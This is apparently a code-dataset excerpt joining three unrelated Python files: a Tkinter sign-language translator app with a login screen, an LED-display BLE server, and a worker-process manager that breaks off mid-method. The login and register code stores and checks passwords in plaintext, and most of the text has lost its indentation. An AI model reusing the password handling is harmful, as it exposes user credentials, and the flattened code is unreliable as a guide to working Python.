                    prediction = {self.categories[i]: self.prediction_result[0][i]
                                  for i in range(len(self.categories))}
prediction = sorted(prediction.items(), key=operator.itemgetter(1), reverse=True)
imgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
ret_thresh, thresh = cv2.threshold(imgray, 127, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if len(contours) < 150:
if self.prediction_count == 0:
self.current_prediction = prediction[0][0]
if self.current_prediction == prediction[0][0]:
self.prediction_count += 1
else:
self.prediction_count = 0
if self.prediction_count < 10:
self.predicted_text = "Hold still..."
self.process_timer = 0
else:
self.predicted_text = prediction[0][0]
self.process_timer += 1
if self.process_timer > 20:
self.predicted_text += str(prediction[0][0])
self.process_timer = 0
print(self.predicted_text)
else:
self.predicted_text = "Can't detect!"
else:
print('ThreadRunner stream end:', self.video_source)
# TODO: reopen stream
self.running = False
break
# assign new frame
self.ret = ret
self.frame = frame
self.roi_ret = roi_ret
self.roi_frame = roi_frame
# sleep for next frame
time.sleep(1 / self.fps)
# get current frame
def get_frame(self):
return self.ret, self.frame
# get current roi frame
def get_roi_frame(self):
return self.roi_ret, self.roi_frame
# get the predicted text
def get_prediction(self):
return self.predicted_text
# Release the video source when the object is destroyed
def __del__(self):
# stop thread
if self.running:
self.running = False
self.thread.join()
# release stream
if self.vid.isOpened():
self.vid.release()
# Camera Frame object creates the camera frame and it updates
# the frame by getting the current frame from ThreadRunner object
class CameraFrame(tk.Frame):
def __init__(self, container, video_source=None, width=None, height=None):
super().__init__(container)
self.container = container
self.video_source = video_source
if not self.video_source:
self.video_source = 0
self.vid = ThreadRunner(self.video_source, width, height)
self.canvas = tk.Canvas(self, width=self.vid.width, height=self.vid.height)
self.canvas.pack()
self.delay = int(1000 / self.vid.fps)
print('CameraFrame source:', self.video_source)
print('CameraFrame fps:', self.vid.fps, 'delay:', self.delay)
self.image = None
self.running = True
self.update_frame()
def update_frame(self):
        # tkinter widgets already have an update() method, so this uses a different name.
        # Get a frame from the video source
ret, frame = self.vid.get_frame()
if ret:
self.image = Image.fromarray(frame)
self.photo = ImageTk.PhotoImage(image=self.image)
self.canvas.create_image(0, 0, image=self.photo, anchor='nw')
if self.running:
self.container.after(self.delay, self.update_frame)
# RoiFrame object creates the frame for roi frame
# updated by ThreadRunner object
class RoiFrame(tk.Frame):
def __init__(self, container, video_capture, fps):
super().__init__(container)
self.container = container
self.video_capture = video_capture
self.fps = fps
self.canvas = tk.Canvas(self, width=64, height=64)
self.canvas.pack()
self.roi_frame = None
self.delay = int(1000 / self.fps)
self.running = True
self.isActive = True
self.image = None
self.update_roi_frame()
def update_roi_frame(self):
ret, self.roi_frame = self.video_capture.get_roi_frame()
if ret:
self.image = Image.fromarray(self.roi_frame)
self.photo = ImageTk.PhotoImage(image=self.image)
self.canvas.create_image(0, 0, image=self.photo, anchor='nw')
else:
self.isActive = False
if self.running:
self.container.after(self.delay, self.update_roi_frame)
# PredictedText object creates a tkinter label object and updates
# the text attribute of label according to the prediction
class PredictedText(tk.Label):
def __init__(self, container, video_capture, fps):
super().__init__(container)
self.container = container
self.video_capture = video_capture
self.fps = fps
self.predicting = True
self.label_text = ""
self.label = tk.Label(self, text="")
self.label.pack()
self.delay = int(25000 / self.fps)
self.update_label()
def update_label(self):
self.label.config(text=self.video_capture.get_prediction())
if self.predicting:
self.container.after(self.delay, self.update_label)
# PredictionText object creates a tkinter text object and
# concatenates the predicted text predicted by the model
class PredictionText(tk.Text):
def __init__(self, container, video_capture, fps):
super().__init__(container)
self.container = container
self.video_capture = video_capture
self.fps = fps
self.predicting = True
self.text_entry = ""
self.predicted_text = ""
self.text = tk.Text(self, width=30, height=3, wrap=tk.WORD)
self.text.pack()
self.delay = int(100000 / self.fps)
self.update_text()
def update_text(self):
self.predicted_text = self.video_capture.get_prediction()
if self.predicted_text != "Hold still..." and self.predicted_text != "Can't detect!":
self.text_entry = self.predicted_text
self.text.insert(END, self.text_entry)
if self.predicting:
self.container.after(self.delay, self.update_text)
class LoginWindow:
def __init__(self):
self.running = False
self.win = tk.Tk()
self.win.title("Login")
self.db = Database("database.db")
self.widgets()
def account_check(self):
if self.username.get() == "" or self.password.get() == "":
msg.showerror("Warning!", "Fields can not be empty!")
else:
            userlist = self.db.queryFunction(
                "SELECT * FROM Users WHERE username = ? AND password = ?",
                (self.username.get(), self.password.get()))
if len(userlist) > 0:
self.win.destroy()
MainWindow(self.username)
else:
msg.showerror("Wrong user!", "User information did not match!")
def exit_window(self):
self.win.quit()
self.win.destroy()
exit()
def register_user(self):
RegisterUserWindow()
def widgets(self):
self.containerFrame = ttk.LabelFrame(self.win, text="Welcome to Turkish Sign Language Translator")
self.containerFrame.grid(column=0, row=0, padx=10, pady=10, sticky=tk.NSEW)
self.username_label = ttk.Label(self.containerFrame, text="Username:")
self.username_label.grid(column=0, row=1, padx=10, pady=5, sticky=tk.NSEW)
self.username = tk.StringVar()
self.username_entry = ttk.Entry(self.containerFrame, textvariable=self.username)
self.username_entry.grid(column=1, row=1, padx=10, pady=5, sticky=tk.NSEW)
self.password_label = ttk.Label(self.containerFrame, text="Password:")
self.password_label.grid(column=0, row=2, padx=10, pady=5, sticky=tk.NSEW)
self.password = tk.StringVar()
self.password_entry = ttk.Entry(self.containerFrame, show="*", textvariable=self.password)
self.password_entry.grid(column=1, row=2, padx=10, pady=5, sticky=tk.NSEW)
self.ok_button = ttk.Button(self.containerFrame, text="OK", command=self.account_check)
self.ok_button.grid(column=0, row=3, padx=10, pady=5, sticky=tk.NSEW)
self.cancel_button = ttk.Button(self.containerFrame, text="Cancel", command=self.exit_window)
self.cancel_button.grid(column=1, row=3, padx=10, pady=5, sticky=tk.NSEW)
self.username_label = ttk.Label(self.containerFrame, text="If you don't have ->")
self.username_label.grid(column=0, row=4, padx=10, pady=5, sticky=tk.NSEW)
self.register_button = ttk.Button(self.containerFrame, text="Register", command=self.register_user)
self.register_button.grid(column=1, row=4, padx=10, pady=5, sticky=tk.NSEW)
self.password_entry.bind("<Return>", lambda e: self.account_check())
self.username_entry.bind("<Return>", lambda e: self.account_check())
self.password_entry.bind("<Escape>", lambda e: self.exit_window())
self.username_entry.bind("<Escape>", lambda e: self.exit_window())
class RegisterUserWindow:
def __init__(self):
self.win2 = tk.Tk()
self.win2.title("Register")
self.db = Database("database.db")
self.widgets()
def create_user(self):
if self.username.get() == "" or self.password.get() == "":
msg.showerror("Warning!", "Fields can not be empty!")
else:
            userlistcheck = self.db.queryFunction(
                "SELECT * FROM Users WHERE username = ? AND password = ?",
                (self.username.get(), self.password.get()))
            if len(userlistcheck) > 0:
                msg.showerror("The user cannot be created.", "User already exists")
else:
self.db.createUser(self.username.get(), self.password.get(), self.firstName.get(), self.lastName.get(),
self.age.get(), self.gender.get())
self.win2.destroy()
def exit_window(self):
self.win2.destroy()
def widgets(self):
self.containerFrame2 = ttk.LabelFrame(self.win2, text="Register a new User")
self.containerFrame2.grid(column=0, row=0, padx=10, pady=10, sticky=tk.NSEW)
self.username_label = ttk.Label(self.containerFrame2, text="Username:")
self.username_label.grid(column=0, row=0, padx=10, pady=5, sticky=tk.NSEW)
self.username = tk.StringVar(self.containerFrame2)
self.username_entry = ttk.Entry(self.containerFrame2, textvariable=self.username)
self.username_entry.grid(column=1, row=0, padx=10, pady=5, sticky=tk.NSEW)
self.password_label = ttk.Label(self.containerFrame2, text="Password:")
self.password_label.grid(column=0, row=1, padx=10, pady=5, sticky=tk.NSEW)
self.password = tk.StringVar(self.containerFrame2)
self.password_entry = ttk.Entry(self.containerFrame2, show="*", textvariable=self.password)
self.password_entry.grid(column=1, row=1, padx=10, pady=5, sticky=tk.NSEW)
self.firstName_label = ttk.Label(self.containerFrame2, text="First Name:")
self.firstName_label.grid(column=0, row=2, padx=10, pady=5, sticky=tk.NSEW)
self.firstName = tk.StringVar(self.containerFrame2)
self.firstName_entry = ttk.Entry(self.containerFrame2, textvariable=self.firstName)
self.firstName_entry.grid(column=1, row=2, padx=10, pady=5, sticky=tk.NSEW)
self.lastName_label = ttk.Label(self.containerFrame2, text="Last Name:")
self.lastName_label.grid(column=0, row=3, padx=10, pady=5, sticky=tk.NSEW)
self.lastName = tk.StringVar(self.containerFrame2)
self.lastName_entry = ttk.Entry(self.containerFrame2, textvariable=self.lastName)
self.lastName_entry.grid(column=1, row=3, padx=10, pady=5, sticky=tk.NSEW)
self.age_label = ttk.Label(self.containerFrame2, text="Age:")
self.age_label.grid(column=0, row=4, padx=10, pady=5, sticky=tk.NSEW)
self.age = tk.StringVar(self.containerFrame2)
self.age_entry = ttk.Entry(self.containerFrame2, textvariable=self.age)
self.age_entry.grid(column=1, row=4, padx=10, pady=5, sticky=tk.NSEW)
self.gender_label = ttk.Label(self.containerFrame2, text="Gender:")
self.gender_label.grid(column=0, row=5, padx=10, pady=5, sticky=tk.NSEW)
self.gender = tk.StringVar(self.containerFrame2)
self.gender_combobox = ttk.Combobox(self.containerFrame2, width=12, textvariable=self.gender)
self.gender_combobox['values'] = ('Male', 'Female', 'Other')
self.gender_combobox.grid(column=1, row=5, padx=10, pady=5, sticky=tk.NSEW)
self.gender_combobox.current(0)
self.ok_button = ttk.Button(self.containerFrame2, text="OK", command=self.create_user)
self.ok_button.grid(column=0, row=6, padx=10, pady=5, sticky=tk.NSEW)
self.cancel_button = ttk.Button(self.containerFrame2, text="Cancel", command=self.exit_window)
self.cancel_button.grid(column=1, row=6, padx=10, pady=5, sticky=tk.NSEW)
self.password_entry.bind("<Return>", lambda e: self.create_user())
self.username_entry.bind("<Return>", lambda e: self.create_user())
self.password_entry.bind("<Escape>", lambda e: self.exit_window())
self.username_entry.bind("<Escape>", lambda e: self.exit_window())
class MainWindow:
def __init__(self, username):
self.win3 = tk.Tk()
self.win3.title("Turkish Sign Language Translator")
self.db = Database("database.db")
self.cameraFrame = None
self.signImage = None
self.predictionLabel = None
self.translationResult = None
self.username = username
self.widgets()
def exit_window(self):
self.cameraFrame.vid.running = False
self.win3.quit()
self.win3.destroy()
quit()
def about_window(self):
msg.showinfo("About us", "This project created by: \nCanberk Enes SEN - 1609998, Muhammet Musa CAM - 1728774 and Furkan GULLE - 1728824 ")
def on_closing(self):
self.cameraFrame.vid.running = False
self.win3.quit()
self.win3.destroy()
exit()
def widgets(self):
menu_bar = Menu(self.win3)
self.win3.config(menu=menu_bar)
file_menu = Menu(menu_bar, tearoff=0)
menu_bar.add_cascade(label="File", menu=file_menu)
file_menu.add_command(label="Exit", command=self.exit_window)
file_menu.add_separator()
help_menu = Menu(menu_bar, tearoff=0)
menu_bar.add_cascade(label="Help", menu=help_menu)
help_menu.add_command(label="About", command=self.about_window)
self.win3.columnconfigure(0, weight=0)
self.win3.columnconfigure(1, weight=1)
self.win3.rowconfigure(0, weight=0)
self.containerFrame3 = ttk.LabelFrame(self.win3, text="Info")
self.containerFrame3.grid(column=0, row=0, padx=10, pady=10, sticky=tk.NSEW)
self.welcome_user = ttk.Label(self.containerFrame3, text=f"Hi {self.username.get()}!")
self.welcome_user.grid(column=0, row=0, padx=5, pady=5, sticky=tk.NSEW)
self.takenote_label = ttk.Label(self.containerFrame3, text="Take a note ✎")
self.takenote_label.grid(column=0, row=1, padx=5, pady=(10, 5), sticky=tk.NSEW)
self.take_note = scrolledtext.ScrolledText(self.containerFrame3, width=15, height=20)
self.take_note.grid(column=0, row=2, padx=5, pady=5, sticky=tk.NS)
self.exit_button = ttk.Button(self.containerFrame3, text="Exit", command=self.exit_window)
self.exit_button.grid(column=0, row=3, padx=5, pady=5, sticky=tk.NSEW)
self.containerFrame4 = ttk.LabelFrame(self.win3, text="Translation")
self.containerFrame4.grid(column=1, row=0, padx=10, pady=10, sticky=tk.NSEW)
self.cameraImageLabel = ttk.Label(self.containerFrame4, text="Camera")
self.cameraImageLabel.grid(column=1, row=0, padx=20, pady=5, sticky=tk.EW)
self.cameraFrame = CameraFrame(self.containerFrame4, video_source=0, width=400)
self.cameraFrame.grid(column=1, row=1, padx=20, pady=5, sticky=tk.EW)
self.signImageLabel = ttk.Label(self.containerFrame4, text="Sign Image")
self.signImageLabel.grid(column=0, row=0, padx=5, pady=5, sticky=tk.EW)
self.signImage = RoiFrame(self.containerFrame4, self.cameraFrame.vid, self.cameraFrame.vid.fps)
self.signImage.grid(column=0, row=1, padx=5, pady=5, sticky=tk.EW)
self.predictionLabel = PredictedText(self.containerFrame4, self.cameraFrame.vid, self.cameraFrame.vid.fps)
self.predictionLabel.grid(column=0, row=2, padx=5, pady=5, columnspan=3)
self.translationResultLabel = ttk.Label(self.containerFrame4, text="Result")
self.translationResultLabel.grid(column=0, row=2, padx=5, pady=5, sticky=tk.EW)
self.translationResult = PredictionText(self.containerFrame4, self.cameraFrame.vid, self.cameraFrame.vid.fps)
self.translationResult.grid(column=0, row=3, padx=5, pady=5, columnspan=3)
self.win3.bind("<Escape>", lambda e: self.exit_window())
class Database:
def __init__(self, db):
self.conn = sqlite3.connect(db)
self.cur = self.conn.cursor()
self.cur.execute("""
CREATE TABLE IF NOT EXISTS Users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT NOT NULL UNIQUE,
password TEXT NOT NULL,
firstName TEXT,
lastName TEXT,
age INTEGER,
gender TEXT
);
""")
self.conn.commit()
    def query_func2(self, query, params=()):
        data = self.cur.execute(query, params)
        rows = data.fetchone()
        return rows
    def queryFunction(self, query, params=()):
        data = self.cur.execute(query, params)
        rows = data.fetchall()
        return rows
def createUser(self, username, password, firstName, lastName, age, gender):
self.cur.execute("INSERT INTO Users VALUES (NULL, ?, ?, ?, ?, ?, ?)",
(username, password, firstName, lastName, age, gender))
self.conn.commit()
def removeUser(self, id):
self.cur.execute("DELETE FROM Users WHERE id=?", (id,))
self.conn.commit()
def updateUser(self, username, password, firstName, lastName, age, gender, id):
self.cur.execute(
"UPDATE Users SET username = ?, password = ?, firstName = ?, lastName = ?, age = ?, gender = ? WHERE id = ?",
(username, password, firstName, lastName, age, gender, id))
self.conn.commit()
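# A hypothetical usage sketch of the Database helper (values illustrative):
#   db = Database("database.db")
#   db.createUser("alice", "secret", "Alice", "Smith", 30, "Female")
#   rows = db.queryFunction("SELECT * FROM Users WHERE username = ?", ("alice",))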
if __name__ == "__main__":
app = LoginWindow()
app.win.mainloop()
|
sparklet.py
|
import fire
import logging
import os
import tempfile
import yaml
from datetime import datetime
from animate import Animator, play_by_id, clear_display
from animation import Animation
from ble_device import BleDevice
from multiprocessing import Process, Queue
from protocol import EPXProtocol, EPXCommand, ProtocolFormat
from serial_device import SerialDevice
from signal import signal, SIGINT
from sys import exit
from collections import namedtuple
DISPLAYWIDTH = 18
DISPLAYHEIGHT = 18
class Sparklet:
def __init__(self):
signal(SIGINT, self.on_sigint)
self.animations_dir = os.path.join(os.getcwd(), 'animations')
os.makedirs(self.animations_dir, exist_ok=True)
self.protocol = EPXProtocol()
self.animator_process = None
self.command_handlers = [
self.on_connect_headerrq,
self.on_clear_display,
self.on_display_brightness,
self.on_enumerate_animations,
self.on_preview_color,
self.on_upload_frame8,
self.on_upload_animation8,
self.on_upload_pixel8,
self.on_remove_animation,
self.on_store_animation,
self.on_play_stored_animation8,
self.on_play_stored_animation8_byname,
self.on_set_device_name,
self.on_request_thumbnail,
self.on_set_key,
self.on_console_command
]
with open('settings.yaml', 'r') as fh:
self.settings = yaml.load(fh, Loader=yaml.FullLoader)
#self.start_animation_process()
def start_animation_process(self):
#self.animator = Animator()
self.frames_queue = Queue()
self.count = 0
args = (self.frames_queue, )
self.animator_process = Process(target=play_frames, args=args)
self.animator_process.start()
    def stop_animation_process(self):
        if not self.animator_process:
            return
        self.animator_process.terminate()
        self.animator_process.join()
        self.animator_process = None
def run_animation_process(self, target, args):
if self.animator_process:
self.animator_process.terminate()
self.animator_process.join()
self.animator_process = Process(target=target, args=args)
self.animator_process.start()
def ble(self):
self.device = BleDevice(self)
logging.info('Starting Sparklet')
self.device.start()
logging.info('Hit <ENTER> to disconnect')
input()
self.device.stop()
self.stop_animation_process()
logging.info('Sparklet stopped')
def serial(self):
self.device = SerialDevice(self)
logging.info('Starting Sparklet')
self.device.start()
self.stop_animation_process()
logging.info('Sparklet stopped')
def on_sigint(self, signum, frame):
self.device.stop()
logging.info('Sparklet stopped')
exit(0)
def on_read_notify(self):
logging.info(f'Sparklet.on_read_notify')
def on_read_request(self, offset):
logging.info(f'Sparklet.on_read_request {offset}')
def on_write_request(self, data, offset):
logging.debug(f'Sparklet.on_write_request received {len(data)} bytes at {datetime.now().strftime("%m/%d/%Y-%I:%M:%S.%f")}')
commands, send_ack = self.protocol.decode(data)
for command in commands:
header, payload = command
logging.info(f'Sparklet.on_write_request {EPXCommand(header.command)} - {header.transaction_id}')
logging.debug(f'Sparklet.on_write_request {payload}')
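                # EPXCommand values are assumed to start at 1, so subtract 1 to
                # index into the zero-based command_handlers list above.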
handler = self.command_handlers[header.command - 1]
success = handler(header, payload)
if send_ack:
frames = self.protocol.encode_binaryack()
logging.debug(f'Sparklet.on_write_request sending BINARY ACK at {datetime.now().strftime("%m/%d/%Y-%I:%M:%S.%f")}')
self._send_frames(frames)
return True
def _send_frames(self, frames):
for frame in frames:
            logging.debug(f'Sparklet._send_frames sent {len(frame)} bytes')
self.device.write(frame)
return True
def on_connect_headerrq(self, command, payload):
data = {
'status': 'success',
'TransactionID': command.transaction_id,
'data': {
'FIRMWARE': '0.1',
'DEVICENAME': self.device.name,
'CAPABILITIES': ['STORAGE'], #'PREVIEW',
'BATTERY': { 'PCT': 100 },
'DISPLAYWIDTH': DISPLAYWIDTH,
'DISPLAYHEIGHT': DISPLAYHEIGHT,
'AUTOPLAY': 1,
'BRIGHTNESS': self.settings['brightness']
},
}
frames = self.protocol.encode(data, ProtocolFormat.JSON.value, 0)
return self._send_frames(frames)
def on_clear_display(self, header, payload):
self.run_animation_process(clear_display, ())
return True
def on_display_brightness(self, header, payload):
self.settings['brightness'] = payload.Brightness
with open('settings.yaml', 'w') as fh:
yaml.dump(self.settings, fh)
return True
def get_animations_list(self):
        files = os.listdir(self.animations_dir)
animations = []
for file in files:
filepath = os.path.join(self.animations_dir, file)
st = os.stat(filepath)
animation = Animation.load(filepath)
item = {}
item['ID'] = animation.id
item['Filename'] = animation.name
item['Size'] = st.st_size
item['UTC'] = animation.utc
animations.append(item)
return animations
def on_enumerate_animations(self, header, payload):
        df = os.statvfs('/')
        space_used = (1 - df.f_bfree / df.f_blocks) * 100
data = {
'status': 'success',
'TransactionID': payload.TransactionID,
'StorageUsed': space_used,
'Sequences': self.get_animations_list()
}
frames = self.protocol.encode(data, ProtocolFormat.JSON.value, 0)
return self._send_frames(frames)
def on_preview_color(self, header, payload):
pass
def on_upload_frame8(self, header, payload):
        # TODO:
        # upload_frame requires a serious amount of CPU to support live
        # preview. Interprocess communication support is a bit weak in
        # Python, and shared-memory support does not arrive until Python 3.8,
        # which is not yet supported on the Raspberry Pi.
# self.frames_queue.put(payload.data)
# self.count += 1
# logging.info(f'put={self.frames_queue.qsize()}')
return True
def on_upload_animation8(self, header, payload):
pass
def on_upload_pixel8(self, header, payload):
pass
def on_remove_animation(self, header, payload):
        files = os.listdir(self.animations_dir)
for file in files:
filepath = os.path.join(self.animations_dir, file)
animation = Animation.load(filepath)
if animation.id == payload.ID:
os.remove(filepath)
break
return True
def on_store_animation(self, header, payload):
filename = os.path.join(self.animations_dir, payload.name)
Animation.save(filename, payload)
return True
def on_play_stored_animation8(self, header, payload):
self.run_animation_process(play_by_id, (payload.ID,))
return True
def on_play_stored_animation8_byname(self, header, payload):
self.run_animation_process(play_by_id, (payload.Name,))
return True
def on_set_device_name(self, header, payload):
pass
def on_request_thumbnail(self, header, payload):
pass
def on_set_key(self, header, payload):
pass
def on_console_command(self, header, payload):
pass
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
fire.Fire(Sparklet)
|
nanny.py
|
from __future__ import print_function, division, absolute_import
from datetime import timedelta
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError
from tornado.locks import Event
from .comm import get_address_host, get_local_address_for, unparse_host_port
from .config import config
from .core import rpc, RPCClosed, CommClosedError, coerce_to_address
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (get_ip, mp_context, silence_logging, json_load_robust,
PeriodicCallback)
from .worker import _ncores, run, parse_memory_limit
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
    The nanny spins up Worker processes, watches them, and kills or restarts
    them as necessary.
"""
process = None
status = None
def __init__(self, scheduler_ip=None, scheduler_port=None,
scheduler_file=None, worker_port=0,
ncores=None, loop=None, local_dir=None, services=None,
name=None, memory_limit='auto', reconnect=True,
validate=False, quiet=False, resources=None, silence_logs=None,
death_timeout=None, preload=(), preload_argv=[], security=None,
contact_address=None, listen_address=None, **kwargs):
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg['address']
elif scheduler_ip is None and config.get('scheduler-address'):
self.scheduler_addr = config['scheduler-address']
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
self._given_worker_port = worker_port
self.ncores = ncores or _ncores
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = death_timeout
self.preload = preload
self.preload_argv = preload_argv
self.contact_address = contact_address
self.memory_terminate_fraction = config.get('worker-memory-terminate', 0.95)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args('worker')
self.listen_args = self.security.get_listen_args('worker')
self.local_dir = local_dir
self.loop = loop or IOLoop.current()
self.scheduler = rpc(self.scheduler_addr, connection_args=self.connection_args)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.ncores)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {'instantiate': self.instantiate,
'kill': self.kill,
'restart': self.restart,
# cannot call it 'close' on the rpc side for naming conflict
'terminate': self._close,
'run': self.run}
super(Nanny, self).__init__(handlers, io_loop=self.loop,
connection_args=self.connection_args,
**kwargs)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100, io_loop=self.loop)
self.periodic_callbacks['memory'] = pc
self._listen_address = listen_address
self.status = 'init'
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.ncores)
@gen.coroutine
def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (gen.TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
try:
yield gen.with_timeout(timedelta(seconds=timeout),
self.scheduler.unregister(address=self.worker_address),
quiet_exceptions=allowed_errors)
except allowed_errors:
pass
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@gen.coroutine
def _start(self, addr_or_port=0):
""" Start nanny, start local process, start watching """
# XXX Factor this out
if not addr_or_port:
# Default address is the required one to reach the scheduler
self.listen(get_local_address_for(self.scheduler.address),
listen_args=self.listen_args)
self.ip = get_address_host(self.address)
elif isinstance(addr_or_port, int):
# addr_or_port is an integer => assume TCP
self.ip = get_ip(
get_address_host(self.scheduler.address)
)
self.listen((self.ip, addr_or_port),
listen_args=self.listen_args)
else:
self.listen(addr_or_port, listen_args=self.listen_args)
self.ip = get_address_host(self.address)
logger.info(' Start Nanny at: %r', self.address)
response = yield self.instantiate()
if response == 'running':
assert self.worker_address
self.status = 'running'
else:
yield self._close()
self.start_periodic_callbacks()
def start(self, addr_or_port=0):
self.loop.add_callback(self._start, addr_or_port)
@gen.coroutine
def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
raise gen.Return('OK')
deadline = self.loop.time() + timeout
yield self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
yield self._unregister(deadline - self.loop.time())
@gen.coroutine
def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(host,
self._given_worker_port)
if self.process is None:
self.process = WorkerProcess(
worker_args=(self.scheduler_addr,),
worker_kwargs=dict(ncores=self.ncores,
local_dir=self.local_dir,
services=self.services,
service_ports={'nanny': self.port},
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address),
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit,
)
self.auto_restart = True
if self.death_timeout:
try:
result = yield gen.with_timeout(
timedelta(seconds=self.death_timeout),
self.process.start()
)
except gen.TimeoutError:
yield self._close(timeout=self.death_timeout)
raise gen.Return('timed out')
else:
result = yield self.process.start()
raise gen.Return(result)
@gen.coroutine
def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
@gen.coroutine
def _():
if self.process is not None:
yield self.kill()
yield self.instantiate()
try:
yield gen.with_timeout(timedelta(seconds=timeout), _())
except gen.TimeoutError:
logger.error("Restart timed out, returning before finished")
raise gen.Return('timed out')
else:
raise gen.Return('OK')
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above 95% """
if self.status != 'running':
return
memory = psutil.Process(self.process.pid).memory_info().rss
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning("Worker exceeded 95% memory budget. Restarting")
self.process.process.terminate()
def is_alive(self):
return self.process is not None and self.process.status == 'running'
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
@gen.coroutine
def _on_exit(self, exitcode):
if self.status not in ('closing', 'closed'):
try:
yield self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
yield self._close()
return
try:
if self.status not in ('closing', 'closed'):
if self.auto_restart:
logger.warning("Restarting worker")
yield self.instantiate()
except Exception:
logger.error("Failed to restart worker after its process exited",
exc_info=True)
@property
def pid(self):
return self.process and self.process.pid
@gen.coroutine
def _close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status in ('closing', 'closed'):
raise gen.Return('OK')
self.status = 'closing'
logger.info("Closing Nanny at %r", self.address)
self.stop()
try:
if self.process is not None:
yield self.kill(timeout=timeout)
except Exception:
pass
self.process = None
self.rpc.close()
self.scheduler.close_rpc()
self.status = 'closed'
raise gen.Return('OK')
class WorkerProcess(object):
def __init__(self, worker_args, worker_kwargs, worker_start_args,
silence_logs, on_exit):
self.status = 'init'
self.silence_logs = silence_logs
self.worker_args = worker_args
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
@gen.coroutine
def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == 'running':
raise gen.Return(self.status)
if self.status == 'starting':
yield self.running.wait()
raise gen.Return(self.status)
while True:
# FIXME: this sometimes stalls in _wait_until_connected
# our temporary solution is to retry a few times if the process
# doesn't start up in five seconds
self.init_result_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
try:
self.process = AsyncProcess(
target=self._run,
kwargs=dict(worker_args=self.worker_args,
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q),
)
self.process.daemon = True
self.process.set_exit_callback(self._on_exit)
self.running = Event()
self.stopped = Event()
self.status = 'starting'
yield self.process.start()
if self.status == 'starting':
yield gen.with_timeout(timedelta(seconds=5),
self._wait_until_started())
except gen.TimeoutError:
logger.info("Failed to start worker process. Restarting")
yield gen.with_timeout(timedelta(seconds=1),
self.process.terminate())
else:
break
if self.status == 'starting':
msg = yield self._wait_until_connected()
if not msg:
raise gen.Return(self.status)
self.worker_address = msg['address']
self.worker_dir = msg['dir']
assert self.worker_address
self.status = 'running'
self.running.set()
raise gen.Return(self.status)
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode,)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode,)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return (self.process.pid
if self.process and self.process.is_alive()
else None)
def mark_stopped(self):
if self.status != 'stopped':
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.warning(msg)
self.status = 'stopped'
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
@gen.coroutine
def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == 'stopped':
return
if self.status == 'stopping':
yield self.stopped.wait()
return
assert self.status in ('starting', 'running')
self.status = 'stopping'
process = self.process
self.child_stop_q.put({'op': 'stop',
